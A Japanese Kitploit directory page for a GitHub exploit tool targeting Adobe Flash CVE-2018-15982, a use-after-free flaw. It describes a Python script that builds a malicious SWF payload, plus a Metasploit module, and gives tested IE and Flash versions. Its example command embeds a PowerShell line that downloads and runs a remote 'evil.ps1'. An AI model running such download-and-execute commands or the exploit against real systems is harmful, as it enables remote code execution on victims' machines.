Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
adobe-flash-cve2018-15982 — CVE-2018-15982 用のスクリプトと Metasploit モジュール | Kitploit
ツール/GitHubGitHub/kphongagsorn/adobe-flash-cve2018-15982
エクスプロイトフレームワークペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用
GitHubkphongagsorn/adobe-flash-cve2018-15982

adobe-flash-cve2018-15982

CVE-2018-15982 用のスクリプトと Metasploit モジュール

リポジトリを見る
1156年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Adobe Flash CVE-2018-15982

このスクリプトは、CVE-2018-15982用のswfペイロードを作成します。これは https://github.com/smgorelik/Windows-RCE-exploits のPoCに基づいています。この脆弱性は、Gigamon ATRのChenming Xu氏とEd Miles氏によって発見されました。

この脆弱性は、Flashで任意のコード実行を可能にするuse-after-freeの欠陥です。詳細は以下のリンクを参照してください。

  • https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982

注: 現在は1ブロックのみスプレーしています。この点はスクリプト作成後に気付きました。

使用方法:

python create_swf.py <command> <output file name>

使用例:

python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf

動作確認済み環境:

  • Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
  • Adobe Flash 31.0.0.153, 29.0.0.140

例

ペイロードの作成:

alt text

ペイロードの実行:

alt text

実行の確認:

alt text

Metasploitモジュール

alt text

ツールをダウンロード